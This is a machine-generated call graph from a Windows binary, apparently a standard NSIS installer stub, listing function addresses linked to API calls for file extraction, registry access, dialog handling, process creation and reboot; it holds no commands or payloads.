3945->3946 3947 401423 25 API calls 3946->3947 3948 401e30 ShellExecuteW 3947->3948 3949 401e61 3948->3949 3955 401a15 3956 402bbf 18 API calls 3955->3956 3957 401a1e ExpandEnvironmentStringsW 3956->3957 3958 401a32 3957->3958 3960 401a45 3957->3960 3959 401a37 lstrcmpW 3958->3959 3958->3960 3959->3960 3961 402515 3962 402bbf 18 API calls 3961->3962 3963 40251c 3962->3963 3966 405c25 GetFileAttributesW CreateFileW 3963->3966 3965 402528 3966->3965 3967 402095 3968 402bbf 18 API calls 3967->3968 3969 40209c 3968->3969 3970 402bbf 18 API calls 3969->3970 3971 4020a6 3970->3971 3972 402bbf 18 API calls 3971->3972 3973 4020b0 3972->3973 3974 402bbf 18 API calls 3973->3974 3975 4020ba 3974->3975 3976 402bbf 18 API calls 3975->3976 3978 4020c4 3976->3978 3977 402103 CoCreateInstance 3982 402122 3977->3982 3978->3977 3979 402bbf 18 API calls 3978->3979 3979->3977 3980 401423 25 API calls 3981 4021e1 3980->3981 3982->3980 3982->3981 3983 401b16 3984 402bbf 18 API calls 3983->3984 3985 401b1d 3984->3985 3986 402ba2 18 API calls 3985->3986 3987 401b26 wsprintfW 3986->3987 3988 402a4c 3987->3988 3503 40159b 3504 402bbf 18 API calls 3503->3504 3505 4015a2 SetFileAttributesW 3504->3505 3506 4015b4 3505->3506 3591 40229d 3592 4022a5 3591->3592 3593 4022ab 3591->3593 3594 402bbf 18 API calls 3592->3594 3595 4022b9 3593->3595 3596 402bbf 18 API calls 3593->3596 3594->3593 3597 402bbf 18 API calls 3595->3597 3599 4022c7 3595->3599 3596->3595 3597->3599 3598 402bbf 18 API calls 3600 4022d0 WritePrivateProfileStringW 3598->3600 3599->3598 3989 401f1d 3990 402bbf 18 API calls 3989->3990 3991 401f24 3990->3991 3992 40642a 5 API calls 3991->3992 3993 401f33 3992->3993 3994 401f4f GlobalAlloc 3993->3994 3997 401fb7 3993->3997 3995 401f63 3994->3995 3994->3997 3996 40642a 5 API calls 3995->3996 3998 401f6a 3996->3998 3999 40642a 5 API calls 3998->3999 4000 401f74 3999->4000 4000->3997 4004 405f97 wsprintfW 4000->4004 4002 401fa9 4005 405f97 wsprintfW 4002->4005 4004->4002 4005->3997 4006 40149e 4007 402288 4006->4007 4008 4014ac PostQuitMessage 4006->4008 4008->4007 4009 40249e 4010 402cc9 19 API calls 4009->4010 4011 4024a8 4010->4011 4012 402ba2 18 API calls 4011->4012 4013 4024b1 4012->4013 4014 4024d5 RegEnumValueW 4013->4014 4015 4024c9 RegEnumKeyW 4013->4015 4016 40281e 4013->4016 4014->4016 4017 4024ee RegCloseKey 4014->4017 4015->4017 4017->4016 3623 40231f 3624 402324 3623->3624 3625 40234f 3623->3625 3646 402cc9 3624->3646 3627 402bbf 18 API calls 3625->3627 3629 402356 3627->3629 3628 40232b 3630 402335 3628->3630 3634 40236c 3628->3634 3635 402bff RegOpenKeyExW 3629->3635 3631 402bbf 18 API calls 3630->3631 3632 40233c RegDeleteValueW RegCloseKey 3631->3632 3632->3634 3636 402c93 3635->3636 3643 402c2a 3635->3643 3636->3634 3637 402c50 RegEnumKeyW 3638 402c62 RegCloseKey 3637->3638 3637->3643 3640 40642a 5 API calls 3638->3640 3639 402c87 RegCloseKey 3644 402c76 3639->3644 3642 402c72 3640->3642 3641 402bff 5 API calls 3641->3643 3642->3644 3645 402ca2 RegDeleteKeyW 3642->3645 3643->3637 3643->3638 3643->3639 3643->3641 3644->3636 3645->3644 3647 402bbf 18 API calls 3646->3647 3648 402ce2 3647->3648 3649 402cf0 RegOpenKeyExW 3648->3649 3649->3628 2821 4032a0 SetErrorMode GetVersion 2822 4032d5 2821->2822 2823 4032db 2821->2823 2824 40642a 5 API calls 2822->2824 2909 4063ba GetSystemDirectoryW 2823->2909 2824->2823 2826 4032f1 lstrlenA 2826->2823 2827 403301 2826->2827 2912 40642a GetModuleHandleA 2827->2912 2830 40642a 5 API calls 2831 403310 #17 OleInitialize SHGetFileInfoW 2830->2831 2918 406050 lstrcpynW 2831->2918 2833 40334d GetCommandLineW 2919 406050 lstrcpynW 2833->2919 2835 40335f GetModuleHandleW 2836 403377 2835->2836 2920 405a31 2836->2920 2839 4034b0 GetTempPathW 2924 40326f 2839->2924 2841 4034c8 2842 403522 DeleteFileW 2841->2842 2843 4034cc GetWindowsDirectoryW lstrcatW 2841->2843 2934 402dee GetTickCount GetModuleFileNameW 2842->2934 2844 40326f 12 API calls 2843->2844 2847 4034e8 2844->2847 2845 405a31 CharNextW 2848 40339f 2845->2848 2847->2842 2849 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2847->2849 2848->2845 2851 40349b 2848->2851 2853 403499 2848->2853 2852 40326f 12 API calls 2849->2852 3018 406050 lstrcpynW 2851->3018 2860 40351a 2852->2860 2853->2839 2854 4035d9 2962 403899 2854->2962 2855 403536 2855->2854 2857 405a31 CharNextW 2855->2857 2861 4035e9 2855->2861 2873 403555 2857->2873 2860->2842 2860->2861 3035 4037bf 2861->3035 2862 403723 2865 4037a7 ExitProcess 2862->2865 2866 40372b GetCurrentProcess OpenProcessToken 2862->2866 2863 403603 3042 405795 2863->3042 2871 403743 LookupPrivilegeValueW AdjustTokenPrivileges 2866->2871 2872 403777 2866->2872 2868 4035b3 3019 405b0c 2868->3019 2869 403619 3046 405718 2869->3046 2871->2872 2876 40642a 5 API calls 2872->2876 2873->2868 2873->2869 2879 40377e 2876->2879 2880 403793 ExitWindowsEx 2879->2880 2883 4037a0 2879->2883 2880->2865 2880->2883 2881 40363a lstrcatW lstrcmpiW 2881->2861 2885 403656 2881->2885 2882 40362f lstrcatW 2882->2881 3084 40140b 2883->3084 2888 403662 2885->2888 2889 40365b 2885->2889 2887 4035ce 3034 406050 lstrcpynW 2887->3034 3054 4056fb CreateDirectoryW 2888->3054 3049 40567e CreateDirectoryW 2889->3049 2894 403667 SetCurrentDirectoryW 2895 403682 2894->2895 2896 403677 2894->2896 3058 406050 lstrcpynW 2895->3058 3057 406050 lstrcpynW 2896->3057 2901 4036ce CopyFileW 2906 403690 2901->2906 2902 403717 2903 405ef1 38 API calls 2902->2903 2903->2861 2905 406072 18 API calls 2905->2906 2906->2902 2906->2905 2908 403702 CloseHandle 2906->2908 3059 406072 2906->3059 3077 405ef1 MoveFileExW 2906->3077 3081 405730 CreateProcessW 2906->3081 2908->2906 2910 4063dc wsprintfW LoadLibraryExW 2909->2910 2910->2826 2913 406450 GetProcAddress 2912->2913 2914 406446 2912->2914 2916 403309 2913->2916 2915 4063ba 3 API calls 2914->2915 2917 40644c 2915->2917 2916->2830 2917->2913 2917->2916 2918->2833 2919->2835 2921 405a37 2920->2921 2922 403386 CharNextW 2921->2922 2923 405a3e CharNextW 2921->2923 2922->2839 2922->2848 2923->2921 3087 4062e4 2924->3087 2926 403285 2926->2841 2927 40327b 2927->2926 3096 405a04 lstrlenW CharPrevW 2927->3096 2930 4056fb 2 API calls 2931 403293 2930->2931 3099 405c54 2931->3099 3103 405c25 GetFileAttributesW CreateFileW 2934->3103 2936 402e2e 2956 402e3e 2936->2956 3104 406050 lstrcpynW 2936->3104 2938 402e54 3105 405a50 lstrlenW 2938->3105 2942 402e65 GetFileSize 2943 402f61 2942->2943 2961 402e7c 2942->2961 3110 402d8a 2943->3110 2945 402f6a 2947 402f9a GlobalAlloc 2945->2947 2945->2956 3145 403258 SetFilePointer 2945->3145 3121 403258 SetFilePointer 2947->3121 2948 402fcd 2953 402d8a 6 API calls 2948->2953 2951 402f83 2954 403242 ReadFile 2951->2954 2952 402fb5 3122 403027 2952->3122 2953->2956 2957 402f8e 2954->2957 2956->2855 2957->2947 2957->2956 2958 402d8a 6 API calls 2958->2961 2959 402fc1 2959->2956 2959->2959 2960 402ffe SetFilePointer 2959->2960 2960->2956 2961->2943 2961->2948 2961->2956 2961->2958 3142 403242 2961->3142 2963 40642a 5 API calls 2962->2963 2964 4038ad 2963->2964 2965 4038b3 2964->2965 2966 4038c5 2964->2966 3182 405f97 wsprintfW 2965->3182 3183 405f1d RegOpenKeyExW 2966->3183 2970 403914 lstrcatW 2971 4038c3 2970->2971 3166 403b6f 2971->3166 2972 405f1d 3 API calls 2972->2970 2975 405b0c 18 API calls 2976 403946 2975->2976 2977 4039da 2976->2977 2980 405f1d 3 API calls 2976->2980 2978 405b0c 18 API calls 2977->2978 2979 4039e0 2978->2979 2982 4039f0 LoadImageW 2979->2982 2983 406072 18 API calls 2979->2983 2981 403978 2980->2981 2981->2977 2986 403999 lstrlenW 2981->2986 2990 405a31 CharNextW 2981->2990 2984 403a96 2982->2984 2985 403a17 RegisterClassW 2982->2985 2983->2982 2989 40140b 2 API calls 2984->2989 2987 403aa0 2985->2987 2988 403a4d SystemParametersInfoW CreateWindowExW 2985->2988 2991 4039a7 lstrcmpiW 2986->2991 2992 4039cd 2986->2992 2987->2861 2988->2984 2993 403a9c 2989->2993 2994 403996 2990->2994 2991->2992 2995 4039b7 GetFileAttributesW 2991->2995 2996 405a04 3 API calls 2992->2996 2993->2987 2998 403b6f 19 API calls 2993->2998 2994->2986 2997 4039c3 2995->2997 2999 4039d3 2996->2999 2997->2992 3000 405a50 2 API calls 2997->3000 3001 403aad 2998->3001 3188 406050 lstrcpynW 2999->3188 3000->2992 3003 403ab9 ShowWindow 3001->3003 3004 403b3c 3001->3004 3006 4063ba 3 API calls 3003->3006 3175 405282 OleInitialize 3004->3175 3007 403ad1 3006->3007 3009 403adf GetClassInfoW 3007->3009 3011 4063ba 3 API calls 3007->3011 3008 403b42 3010 403b5e 3008->3010 3015 403b46 3008->3015 3013 403af3 GetClassInfoW RegisterClassW 3009->3013 3014 403b09 DialogBoxParamW 3009->3014 3012 40140b 2 API calls 3010->3012 3011->3009 3012->2987 3013->3014 3016 40140b 2 API calls 3014->3016 3015->2987 3017 40140b 2 API calls 3015->3017 3016->2987 3017->2987 3018->2853 3197 406050 lstrcpynW 3019->3197 3021 405b1d 3198 405aaf CharNextW CharNextW 3021->3198 3024 4035bf 3024->2861 3033 406050 lstrcpynW 3024->3033 3025 4062e4 5 API calls 3031 405b33 3025->3031 3026 405b64 lstrlenW 3027 405b6f 3026->3027 3026->3031 3028 405a04 3 API calls 3027->3028 3030 405b74 GetFileAttributesW 3028->3030 3030->3024 3031->3024 3031->3026 3032 405a50 2 API calls 3031->3032 3204 406393 FindFirstFileW 3031->3204 3032->3026 3033->2887 3034->2854 3036 4037d7 3035->3036 3037 4037c9 CloseHandle 3035->3037 3207 403804 3036->3207 3037->3036 3043 4057aa 3042->3043 3044 403611 ExitProcess 3043->3044 3045 4057be MessageBoxIndirectW 3043->3045 3045->3044 3047 40642a 5 API calls 3046->3047 3048 40361e lstrcatW 3047->3048 3048->2881 3048->2882 3050 403660 3049->3050 3051 4056cf GetLastError 3049->3051 3050->2894 3051->3050 3052 4056de SetFileSecurityW 3051->3052 3052->3050 3053 4056f4 GetLastError 3052->3053 3053->3050 3055 40570b 3054->3055 3056 40570f GetLastError 3054->3056 3055->2894 3056->3055 3057->2895 3058->2906 3062 40607f 3059->3062 3060 4062ca 3061 4036c1 DeleteFileW 3060->3061 3265 406050 lstrcpynW 3060->3265 3061->2901 3061->2906 3062->3060 3064 406132 GetVersion 3062->3064 3065 406298 lstrlenW 3062->3065 3068 406072 10 API calls 3062->3068 3069 405f1d 3 API calls 3062->3069 3070 4061ad GetSystemDirectoryW 3062->3070 3071 4061c0 GetWindowsDirectoryW 3062->3071 3072 4062e4 5 API calls 3062->3072 3073 4061f4 SHGetSpecialFolderLocation 3062->3073 3074 406072 10 API calls 3062->3074 3075 406239 lstrcatW 3062->3075 3263 405f97 wsprintfW 3062->3263 3264 406050 lstrcpynW 3062->3264 3064->3062 3065->3062 3068->3065 3069->3062 3070->3062 3071->3062 3072->3062 3073->3062 3076 40620c SHGetPathFromIDListW CoTaskMemFree 3073->3076 3074->3062 3075->3062 3076->3062 3078 405f12 3077->3078 3079 405f05 3077->3079 3078->2906 3266 405d7f lstrcpyW 3079->3266 3082 405763 CloseHandle 3081->3082 3083 40576f 3081->3083 3082->3083 3083->2906 3085 401389 2 API calls 3084->3085 3086 401420 3085->3086 3086->2865 3093 4062f1 3087->3093 3088 406367 3089 40636c CharPrevW 3088->3089 3091 40638d 3088->3091 3089->3088 3090 40635a CharNextW 3090->3088 3090->3093 3091->2927 3092 405a31 CharNextW 3092->3093 3093->3088 3093->3090 3093->3092 3094 406346 CharNextW 3093->3094 3095 406355 CharNextW 3093->3095 3094->3093 3095->3090 3097 405a20 lstrcatW 3096->3097 3098 40328d 3096->3098 3097->3098 3098->2930 3100 405c61 GetTickCount GetTempFileNameW 3099->3100 3101 40329e 3100->3101 3102 405c97 3100->3102 3101->2841 3102->3100 3102->3101 3103->2936 3104->2938 3106 405a5e 3105->3106 3107 402e5a 3106->3107 3108 405a64 CharPrevW 3106->3108 3109 406050 lstrcpynW 3107->3109 3108->3106 3108->3107 3109->2942 3111 402d93 3110->3111 3112 402dab 3110->3112 3113 402da3 3111->3113 3114 402d9c DestroyWindow 3111->3114 3115 402db3 3112->3115 3116 402dbb GetTickCount 3112->3116 3113->2945 3114->3113 3146 406466 3115->3146 3118 402dc9 CreateDialogParamW ShowWindow 3116->3118 3119 402dec 3116->3119 3118->3119 3119->2945 3121->2952 3123 403040 3122->3123 3124 40306e 3123->3124 3163 403258 SetFilePointer 3123->3163 3125 403242 ReadFile 3124->3125 3127 403079 3125->3127 3128 4031db 3127->3128 3129 40308b GetTickCount 3127->3129 3131 4031c5 3127->3131 3130 40321d 3128->3130 3135 4031df 3128->3135 3129->3131 3138 4030da 3129->3138 3132 403242 ReadFile 3130->3132 3131->2959 3132->3131 3133 403242 ReadFile 3133->3138 3134 403242 ReadFile 3134->3135 3135->3131 3135->3134 3136 405cd7 WriteFile 3135->3136 3136->3135 3137 403130 GetTickCount 3137->3138 3138->3131 3138->3133 3138->3137 3139 403155 MulDiv wsprintfW 3138->3139 3161 405cd7 WriteFile 3138->3161 3150 4051af 3139->3150 3164 405ca8 ReadFile 3142->3164 3145->2951 3147 406483 PeekMessageW 3146->3147 3148 402db9 3147->3148 3149 406479 DispatchMessageW 3147->3149 3148->2945 3149->3147 3151 4051ca 3150->3151 3160 40526c 3150->3160 3152 4051e6 lstrlenW 3151->3152 3153 406072 18 API calls 3151->3153 3154 4051f4 lstrlenW 3152->3154 3155 40520f 3152->3155 3153->3152 3156 405206 lstrcatW 3154->3156 3154->3160 3157 405222 3155->3157 3158 405215 SetWindowTextW 3155->3158 3156->3155 3159 405228 SendMessageW SendMessageW SendMessageW 3157->3159 3157->3160 3158->3157 3159->3160 3160->3138 3162 405cf5 3161->3162 3162->3138 3163->3124 3165 403255 3164->3165 3165->2961 3167 403b83 3166->3167 3189 405f97 wsprintfW 3167->3189 3169 403bf4 3170 406072 18 API calls 3169->3170 3171 403c00 SetWindowTextW 3170->3171 3172 403924 3171->3172 3173 403c1c 3171->3173 3172->2975 3173->3172 3174 406072 18 API calls 3173->3174 3174->3173 3190 404160 3175->3190 3177 4052cc 3178 404160 SendMessageW 3177->3178 3180 4052de CoUninitialize 3178->3180 3179 4052a5 3179->3177 3193 401389 3179->3193 3180->3008 3182->2971 3184 4038f5 3183->3184 3185 405f51 RegQueryValueExW 3183->3185 3184->2970 3184->2972 3187 405f72 RegCloseKey 3185->3187 3187->3184 3188->2977 3189->3169 3191 404178 3190->3191 3192 404169 SendMessageW 3190->3192 3191->3179 3192->3191 3195 401390 3193->3195 3194 4013fe 3194->3179 3195->3194 3196 4013cb MulDiv SendMessageW 3195->3196 3196->3195 3197->3021 3199 405acc 3198->3199 3203 405ade 3198->3203 3200 405ad9 CharNextW 3199->3200 3199->3203 3201 405b02 3200->3201 3201->3024 3201->3025 3202 405a31 CharNextW 3202->3203 3203->3201 3203->3202 3205 4063b4 3204->3205 3206 4063a9 FindClose 3204->3206 3205->3031 3206->3205 3208 403812 3207->3208 3209 403817 FreeLibrary GlobalFree 3208->3209 3210 4037dc 3208->3210 3209->3209 3209->3210 3211 405841 3210->3211 3212 405b0c 18 API calls 3211->3212 3213 405861 3212->3213 3214 405880 3213->3214 3215 405869 DeleteFileW 3213->3215 3217 4059ab 3214->3217 3250 406050 lstrcpynW 3214->3250 3216 4035f2 OleUninitialize 3215->3216 3216->2862 3216->2863 3217->3216 3224 406393 2 API calls 3217->3224 3219 4058a6 3220 4058b9 3219->3220 3221 4058ac lstrcatW 3219->3221 3223 405a50 2 API calls 3220->3223 3222 4058bf 3221->3222 3225 4058cf lstrcatW 3222->3225 3227 4058da lstrlenW FindFirstFileW 3222->3227 3223->3222 3226 4059c5 3224->3226 3225->3227 3226->3216 3228 4059c9 3226->3228 3230 4059a0 3227->3230 3248 4058fc 3227->3248 3229 405a04 3 API calls 3228->3229 3231 4059cf 3229->3231 3230->3217 3233 4057f9 5 API calls 3231->3233 3232 405983 FindNextFileW 3236 405999 FindClose 3232->3236 3232->3248 3235 4059db 3233->3235 3237 4059f5 3235->3237 3238 4059df 3235->3238 3236->3230 3240 4051af 25 API calls 3237->3240 3238->3216 3241 4051af 25 API calls 3238->3241 3240->3216 3243 4059ec 3241->3243 3242 405841 62 API calls 3242->3248 3244 405ef1 38 API calls 3243->3244 3246 4059f3 3244->3246 3245 4051af 25 API calls 3245->3232 3246->3216 3247 4051af 25 API calls 3247->3248 3248->3232 3248->3242 3248->3245 3248->3247 3249 405ef1 38 API calls 3248->3249 3251 406050 lstrcpynW 3248->3251 3252 4057f9 3248->3252 3249->3248 3250->3219 3251->3248 3260 405c00 GetFileAttributesW 3252->3260 3255 405814 RemoveDirectoryW 3257 405822 3255->3257 3256 40581c DeleteFileW 3256->3257 3258 405826 3257->3258 3259 405832 SetFileAttributesW 3257->3259 3258->3248 3259->3258 3261 405c12 SetFileAttributesW 3260->3261 3262 405805 3260->3262 3261->3262 3262->3255 3262->3256 3262->3258 3263->3062 3264->3062 3265->3061 3267 405da7 3266->3267 3268 405dcd GetShortPathNameW 3266->3268 3293 405c25 GetFileAttributesW CreateFileW 3267->3293 3270 405de2 3268->3270 3271 405eec 3268->3271 3270->3271 3273 405dea wsprintfA 3270->3273 3271->3078 3272 405db1 CloseHandle GetShortPathNameW 3272->3271 3274 405dc5 3272->3274 3275 406072 18 API calls 3273->3275 3274->3268 3274->3271 3276 405e12 3275->3276 3294 405c25 GetFileAttributesW CreateFileW 3276->3294 3278 405e1f 3278->3271 3279 405e2e GetFileSize GlobalAlloc 3278->3279 3280 405e50 3279->3280 3281 405ee5 CloseHandle 3279->3281 3282 405ca8 ReadFile 3280->3282 3281->3271 3283 405e58 3282->3283 3283->3281 3295 405b8a lstrlenA 3283->3295 3286 405e83 3288 405b8a 4 API calls 3286->3288 3287 405e6f lstrcpyA 3289 405e91 3287->3289 3288->3289 3290 405ec8 SetFilePointer 3289->3290 3291 405cd7 WriteFile 3290->3291 3292 405ede GlobalFree 3291->3292 3292->3281 3293->3272 3294->3278 3296 405bcb lstrlenA 3295->3296 3297 405bd3 3296->3297 3298 405ba4 lstrcmpiA 3296->3298 3297->3286 3297->3287 3298->3297 3299 405bc2 CharNextA 3298->3299 3299->3296 4019 405123 4020 405133 4019->4020 4021 405147 4019->4021 4022 405190 4020->4022 4023 405139 4020->4023 4024 40514f IsWindowVisible 4021->4024 4030 405166 4021->4030 4025 405195 CallWindowProcW 4022->4025 4026 404160 SendMessageW 4023->4026 4024->4022 4027 40515c 4024->4027 4028 405143 4025->4028 4026->4028 4032 404a79 SendMessageW 4027->4032 4030->4025 4037 404af9 4030->4037 4033 404ad8 SendMessageW 4032->4033 4034 404a9c GetMessagePos ScreenToClient SendMessageW 4032->4034 4035 404ad0 4033->4035 4034->4035 4036 404ad5 4034->4036 4035->4030 4036->4033 4046 406050 lstrcpynW 4037->4046 4039 404b0c 4047 405f97 wsprintfW 4039->4047 4041 404b16 4042 40140b 2 API calls 4041->4042 4043 404b1f 4042->4043 4048 406050 lstrcpynW 4043->4048 4045 404b26 4045->4022 4046->4039 4047->4041 4048->4045 4049 401ca3 4050 402ba2 18 API calls 4049->4050 4051 401ca9 IsWindow 4050->4051 4052 401a05 4051->4052 4053 402a27 SendMessageW 4054 402a41 InvalidateRect 4053->4054 4055 402a4c 4053->4055 4054->4055 4056 404228 lstrcpynW lstrlenW 4057 40242a 4058 402cc9 19 API calls 4057->4058 4059 402434 4058->4059 4060 402bbf 18 API calls 4059->4060 4061 40243d 4060->4061 4062 402448 RegQueryValueExW 4061->4062 4067 40281e 4061->4067 4063 40246e RegCloseKey 4062->4063 4064 402468 4062->4064 4063->4067 4064->4063 4068 405f97 wsprintfW 4064->4068 4068->4063 4069 404b2b GetDlgItem GetDlgItem 4070 404b7d 7 API calls 4069->4070 4078 404d96 4069->4078 4071 404c20 DeleteObject 4070->4071 4072 404c13 SendMessageW 4070->4072 4073 404c29 4071->4073 4072->4071 4075 404c60 4073->4075 4077 406072 18 API calls 4073->4077 4074 404e7a 4076 404f26 4074->4076 4080 404d89 4074->4080 4086 404ed3 SendMessageW 4074->4086 4079 404114 19 API calls 4075->4079 4081 404f30 SendMessageW 4076->4081 4082 404f38 4076->4082 4083 404c42 SendMessageW SendMessageW 4077->4083 4078->4074 4089 404a79 5 API calls 4078->4089 4101 404e07 4078->4101 4084 404c74 4079->4084 4087 40417b 8 API calls 4080->4087 4081->4082 4093 404f51 4082->4093 4094 404f4a ImageList_Destroy 4082->4094 4098 404f61 4082->4098 4083->4073 4085 404114 19 API calls 4084->4085 4102 404c82 4085->4102 4086->4080 4091 404ee8 SendMessageW 4086->4091 4092 40511c 4087->4092 4088 404e6c SendMessageW 4088->4074 4089->4101 4090 4050d0 4090->4080 4099 4050e2 ShowWindow GetDlgItem ShowWindow 4090->4099 4097 404efb 4091->4097 4095 404f5a GlobalFree 4093->4095 4093->4098 4094->4093 4095->4098 4096 404d57 GetWindowLongW SetWindowLongW 4100 404d70 4096->4100 4107 404f0c SendMessageW 4097->4107 4098->4090 4113 404af9 4 API calls 4098->4113 4114 404f9c 4098->4114 4099->4080 4103 404d76 ShowWindow 4100->4103 4104 404d8e 4100->4104 4101->4074 4101->4088 4102->4096 4106 404cd2 SendMessageW 4102->4106 4108 404d51 4102->4108 4111 404d0e SendMessageW 4102->4111 4112 404d1f SendMessageW 4102->4112 4120 404149 SendMessageW 4103->4120 4121 404149 SendMessageW 4104->4121 4106->4102 4107->4076 4108->4096 4108->4100 4109 404fe0 4115 4050a6 InvalidateRect 4109->4115 4119 405054 SendMessageW SendMessageW 4109->4119 4111->4102 4112->4102 4113->4114 4114->4109 4117 404fca SendMessageW 4114->4117 4115->4090 4116 4050bc 4115->4116 4122 404a34 4116->4122 4117->4109 4119->4109 4120->4080 4121->4078 4125 40496b 4122->4125 4124 404a49 4124->4090 4126 404984 4125->4126 4127 406072 18 API calls 4126->4127 4128 4049e8 4127->4128 4129 406072 18 API calls 4128->4129 4130 4049f3 4129->4130 4131 406072 18 API calls 4130->4131 4132 404a09 lstrlenW wsprintfW SetDlgItemTextW 4131->4132 4132->4124 4133 40172d 4134 402bbf 18 API calls 4133->4134 4135 401734 SearchPathW 4134->4135 4136 40174f 4135->4136 4137 4045af 4138 4045db 4137->4138 4139 4045ec 4137->4139 4198 405779 GetDlgItemTextW 4138->4198 4140 4045f8 GetDlgItem 4139->4140 4148 404657 4139->4148 4143 40460c 4140->4143 4142 4045e6 4145 4062e4 5 API calls 4142->4145 4146 404620 SetWindowTextW 4143->4146 4151 405aaf 4 API calls 4143->4151 4144 40473b 4147 4048ea 4144->4147 4200 405779 GetDlgItemTextW 4144->4200 4145->4139 4152 404114 19 API calls 4146->4152 4150 40417b 8 API calls 4147->4150 4148->4144 4148->4147 4153 406072 18 API calls 4148->4153 4155 4048fe 4150->4155 4156 404616 4151->4156 4157 40463c 4152->4157 4158 4046cb SHBrowseForFolderW 4153->4158 4154 40476b 4159 405b0c 18 API calls 4154->4159 4156->4146 4163 405a04 3 API calls 4156->4163 4160 404114 19 API calls 4157->4160 4158->4144 4161 4046e3 CoTaskMemFree 4158->4161 4162 404771 4159->4162 4164 40464a 4160->4164 4165 405a04 3 API calls 4161->4165 4201 406050 lstrcpynW 4162->4201 4163->4146 4199 404149 SendMessageW 4164->4199 4167 4046f0 4165->4167 4170 404727 SetDlgItemTextW 4167->4170 4174 406072 18 API calls 4167->4174 4169 404650 4172 40642a 5 API calls 4169->4172 4170->4144 4171 404788 4173 40642a 5 API calls 4171->4173 4172->4148 4181 40478f 4173->4181 4175 40470f lstrcmpiW 4174->4175 4175->4170 4177 404720 lstrcatW 4175->4177 4176 4047d0 4202 406050 lstrcpynW 4176->4202 4177->4170 4179 4047d7 4180 405aaf 4 API calls 4179->4180 4182 4047dd GetDiskFreeSpaceW 4180->4182 4181->4176 4185 405a50 2 API calls 4181->4185 4187 404828 4181->4187 4184 404801 MulDiv 4182->4184 4182->4187 4184->4187 4185->4181 4186 404899 4189 4048bc 4186->4189 4191 40140b 2 API calls 4186->4191 4187->4186 4188 404a34 21 API calls 4187->4188 4190 404886 4188->4190 4203 404136 KiUserCallbackDispatcher 4189->4203 4192 40489b SetDlgItemTextW 4190->4192 4193 40488b 4190->4193 4191->4189 4192->4186 4195 40496b 21 API calls 4193->4195 4195->4186 4196 4048d8 4196->4147 4204 404544 4196->4204 4198->4142 4199->4169 4200->4154 4201->4171 4202->4179 4203->4196 4205 404552 4204->4205 4206 404557 SendMessageW 4204->4206 4205->4206 4206->4147 4207 4042b1 4208 4042c9 4207->4208 4211 4043e3 4207->4211 4213 404114 19 API calls 4208->4213 4209 40444d 4210 404457 GetDlgItem 4209->4210 4212 40451f 4209->4212 4215 404471 4210->4215 4216 4044e0 4210->4216 4211->4209 4211->4212 4217 40441e GetDlgItem SendMessageW 4211->4217 4214 40417b 8 API calls 4212->4214 4218 404330 4213->4218 4220 40451a 4214->4220 4215->4216 4221 404497 6 API calls 4215->4221 4216->4212 4222 4044f2 4216->4222 4238 404136 KiUserCallbackDispatcher 4217->4238 4219 404114 19 API calls 4218->4219 4224 40433d CheckDlgButton 4219->4224 4221->4216 4225 404508 4222->4225 4226 4044f8 SendMessageW 4222->4226 4236 404136 KiUserCallbackDispatcher 4224->4236 4225->4220 4229 40450e SendMessageW 4225->4229 4226->4225 4227 404448 4230 404544 SendMessageW 4227->4230 4229->4220 4230->4209 4231 40435b GetDlgItem 4237 404149 SendMessageW 4231->4237 4233 404371 SendMessageW 4234 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4233->4234 4235 40438e GetSysColor 4233->4235 4234->4220 4235->4234 4236->4231 4237->4233 4238->4227 4239 4027b4 4240 4027ba 4239->4240 4241 4027c2 FindClose 4240->4241 4242 402a4c 4240->4242 4241->4242 4243 401b37 4244 401b44 4243->4244 4245 401b88 4243->4245 4246 401bcd 4244->4246 4252 401b5b 4244->4252 4247 401bb2 GlobalAlloc 4245->4247 4248 401b8d 4245->4248 4249 406072 18 API calls 4246->4249 4259 402288 4246->4259 4250 406072 18 API calls 4247->4250 4248->4259 4264 406050 lstrcpynW 4248->4264 4251 402282 4249->4251 4250->4246 4257 405795 MessageBoxIndirectW 4251->4257 4262 406050 lstrcpynW 4252->4262 4255 401b9f GlobalFree 4255->4259 4256 401b6a 4263 406050 lstrcpynW 4256->4263 4257->4259 4260 401b79 4265 406050 lstrcpynW 4260->4265 4262->4256 4263->4260 4264->4255 4265->4259 4266 402537 4267 402562 4266->4267 4268 40254b 4266->4268 4270 402596 4267->4270 4271 402567 4267->4271 4269 402ba2 18 API calls 4268->4269 4278 402552 4269->4278 4273 402bbf 18 API calls 4270->4273 4272 402bbf 18 API calls 4271->4272 4275 40256e WideCharToMultiByte lstrlenA 4272->4275 4274 40259d lstrlenW 4273->4274 4274->4278 4275->4278 4276 4025ca 4277 4025e0 4276->4277 4279 405cd7 WriteFile 4276->4279 4278->4276 4278->4277 4280 405d06 5 API calls 4278->4280 4279->4277 4280->4276 4281 4014b8 4282 4014be 4281->4282 4283 401389 2 API calls 4282->4283 4284 4014c6 4283->4284 3473 4015b9 3474 402bbf 18 API calls 3473->3474 3475 4015c0 3474->3475 3476 405aaf 4 API calls 3475->3476 3488 4015c9 3476->3488 3477 401629 3479 40165b 3477->3479 3480 40162e 3477->3480 3478 405a31 CharNextW 3478->3488 3482 401423 25 API calls 3479->3482 3481 401423 25 API calls 3480->3481 3483 401635 3481->3483 3490 401653 3482->3490 3492 406050 lstrcpynW 3483->3492 3485 4056fb 2 API calls 3485->3488 3486 405718 5 API calls 3486->3488 3487 401642 SetCurrentDirectoryW 3487->3490 3488->3477 3488->3478 3488->3485 3488->3486 3489 40160f GetFileAttributesW 3488->3489 3491 40567e 4 API calls 3488->3491 3489->3488 3491->3488 3492->3487 4285 40293b 4286 402ba2 18 API calls 4285->4286 4287 402941 4286->4287 4288 402964 4287->4288 4289 40297d 4287->4289 4297 40281e 4287->4297 4294 402969 4288->4294 4295 40297a 4288->4295 4290 402993 4289->4290 4291 402987 4289->4291 4293 406072 18 API calls 4290->4293 4292 402ba2 18 API calls 4291->4292 4292->4297 4293->4297 4299 406050 lstrcpynW 4294->4299 4300 405f97 wsprintfW 4295->4300 4299->4297 4300->4297 3518 403c3c 3519 403c54 3518->3519 3520 403d8f 3518->3520 3519->3520 3521 403c60 3519->3521 3522 403da0 GetDlgItem GetDlgItem 3520->3522 3523 403de0 3520->3523 3526 403c6b SetWindowPos 3521->3526 3527 403c7e 3521->3527 3524 404114 19 API calls 3522->3524 3525 403e3a 3523->3525 3535 401389 2 API calls 3523->3535 3530 403dca SetClassLongW 3524->3530 3531 404160 SendMessageW 3525->3531 3536 403d8a 3525->3536 3526->3527 3528 